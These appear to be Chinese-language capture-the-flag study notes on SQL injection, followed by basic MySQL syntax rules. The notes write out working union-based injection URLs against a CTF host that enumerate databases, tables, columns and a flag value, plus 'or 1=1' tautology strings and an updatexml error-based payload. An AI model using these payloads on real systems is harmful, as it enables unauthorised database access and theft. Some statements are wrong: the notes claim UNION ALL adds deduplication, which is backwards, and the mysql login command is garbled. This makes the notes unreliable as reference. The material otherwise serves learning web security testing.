触发实际的sql注入漏洞之前要
1. 先获取cookie值(如果没有cookie值很多时候会被直接弹出到首页,没法进入到一些深层次的代码逻辑)
2. 获取formhash(防止CSRF的)
3. 对POST或GET或cookie中的某个字段进行某种编码(base64等)
4. 特殊字符(%cf宽字符)注入等
5. 结合POST或COOKIE的变量覆盖的sql注入
6. 盲注入sql语句构造的特殊性
简单SQL注入常见过程:爆数据库名-->爆数据库表-->爆数据列-->爆数据项
http://game.sycsec.com:2006/?id=-1'limit 0,1 union select 2,group_concat(schema_name) from
information_schema.schemata --++&submit=submit
(不使用拼接函数)-1'union select 2,schema_name from information_schema.schemata limit 1,1
http://game.sycsec.com:2006/?id=-1'limit 0,1 union select 2,group_concat(table_name) from information_schema.tables
where table_schema='f1ag'--++&submit=submit
http://game.sycsec.com:2006/?id=-1'limit 0,1 union select 2,group_concat(column_name) from information_schema.columns
where table_name='flag'--++&submit=submit
http://game.sycsec.com:2006/?id=-1'limit 0,1 union select 2,f4ag from f1ag.flag--++&submit=submit
重要指令:
mysql -user(u) username -password(p) password or none MySQL登录
SHOW DATABASES;(;可用\g代替):显示当前安装的数据库
SHOW TABLES;查看当前数据库中的可用表的列表
SHOW COLUMNS FROM tablename;查看某个表中的内容,它对每个字段返回一行,行中包含字段名、数据类型、是否允许NULL、键信息、默认值以及其他信息
SELECT tablename.colunname FROM tablename;用来检索数据表中的coulumnname列中的内容,但是同时列出了表明和列名(完全限定)
SELECT coulumname FROM tablename ORDER BY key;以key为导向排序(升序ASC,可省略)
SQL语句格式:
Tips:
limit 后的两个数字表示:第几行开始,读几行
--++ 表示注释
order by 2这样的意思是通过字段数量来进行排序
union的作用是将两个sql语句进行联合,Union all与union 的区别是增加了去重的功能
可能使用 " ) 字符;增大number来探测字段数量,之后才能使用union
") or "1"=("1 |***| ") or 1=1 --+
1' and updatexml(0,concat(0x7e,(SELECT table_name%1.1FROM information_schema.tables where table_schema=database() limit
1,1)),0) and 'a'='a
Concat拼接字段:把多个串链接起来形成一个较长的串,需要一个或多个指定的串,各个串之间用逗号隔开。例如:SELECT Concat(vend_name,'(',vend_country,')') FROM vendors ORDER BY vend_name;d
构造注意:
1、ORDER BY子句必须位于FROM子句之后。
2、当ORDER BY子句和LIMIT子句同时使用时LIMIT子句必须位于ORDER BY子句之后。
3、同时使用WHERE子句和ORDER BY子句时应将ORDER BY子句置于WHERE子句之后。
4、WHERE子句支持=、>、<、!=、<>(不等于)、>=、<=、BETWEEN(指定的两个值之间)过滤操作。
5、AND和OR操作符混合使用时要注意AND操作符的计算次序比OR操作符号的计算次序要高(操作符优先级高),所以一般有多个操作符时要加上圆括号消除歧义(即使不这样做也是正确的)
6、MySQL支持使用NOT对IN、BETWEEN和EXISTS子句取反(其他DBMS允许使用NOT对各种条件取反)。
7、尾空格可能会干扰通配符匹配,例如:'%anvil'如果anvil后有一个空格则不会被匹配出来。可使用'%anvil%'或者使用函数解决此问题。
8、%通配符不会匹配到NULL。
9、SELECT语句的拼接完成的列是没有名字的,它只是一个值,这种是无法在客户机中直接使用的,所以可以用AS关键字赋予一个别名(也称为导出列)。
例如:SELECT Concat(vend_name,'(',vend_country,')') AS vend_title FROM vendors ORDER BY vend_name;